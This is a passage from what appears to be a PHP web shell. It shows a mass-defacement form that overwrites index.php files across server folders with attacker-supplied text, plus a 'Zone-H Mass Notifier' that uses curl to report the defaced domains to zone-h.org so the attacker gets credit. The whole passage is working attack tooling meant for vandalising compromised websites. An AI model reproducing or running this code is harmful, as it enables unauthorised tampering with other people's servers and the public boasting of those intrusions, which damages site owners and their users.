623.             echo "<div style='margin: 5px auto; padding: 5px'>";
624.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
625.             echo "</div>";
626.         } elseif($_POST['tipe_sabun'] == 'murah') {
627.             echo "<div style='margin: 5px auto; padding: 5px'>";
628.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
629.             echo "</div>";
630.         }
631.     } else {
632.     echo "<center>";
633.     echo "<form method='post'>
634.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
635.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
636.     <font style='text-decoration: underline;'>Folder:</font><br>
637.     <input type='text' name='d_dir' value='$_GET[massdeface]' style='width: 450px;' height='10'><br>
638.     <font style='text-decoration: underline;'>Filename:</font><br>
639.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
640.     <font style='text-decoration: underline;'>Index File:</font><br>
641.     <textarea name='script' style='width: 450px; height: 200px;'>JAYALAH INDONESIAKU</textarea><br>
642.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
643.     </form></center>";
644.     }
645. }elseif ($a_f == "zh") {
646. echo"<center><h1> Zone-H Mass Notifer </h1>";
647. echo "<form method='post'>";
648. echo "<input type='text' name='depecer' style='width:500px' placeholder='defacer'><br>";
649. echo "<textarea name='url'  placeholder='http://linuxcode.org' style='width:500px;height:300px;'></textarea><br>";
650. echo "<input type='submit' name='go' value='subMitt' ></form>";
651. $url = explode("\r\n", $_POST['url']);
652. $go = $_POST['go'];
653. function kirim($target,$hacker) {
654.     $ch = curl_init();
655.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
656.           curl_setopt($ch, CURLOPT_URL, "http://zone-h.org/notify/single");
657.           curl_setopt($ch, CURLOPT_POST, true);
658.           curl_setopt($ch, CURLOPT_POSTFIELDS, array(
659.             "defacer" => $hacker,
660.             "domain1" => $target,
661.             "hackmode" => "1",
662.             "reason" => "1",
663.             ));
664.     $res = curl_exec($ch);
665.           curl_close($ch);
666.     return preg_match("/<font color=\"red\">OK<\/font><\/li>/", $res);
667. }
668. if($go) {
669.     foreach($url as $sites) {
670.         if(kirim($sites,$_POST['depecer'])) {
671.             echo "<br>[ OK ] => $sites <br>";
672.         } else {
673.             echo "<br>[ ERROR ] => $sites <br>";
674.         }
675.     }
676. }
677. }
678. }
679. echo "<center><footer style='margin-top:100px;font-size:13px;background:blue;color:#fff;width:100%;'>copyright &copy; ".date('Y')." <a href='http://linuxcode.org' target='_blank'>linuXcode.org</a> - alinko</footer></center>";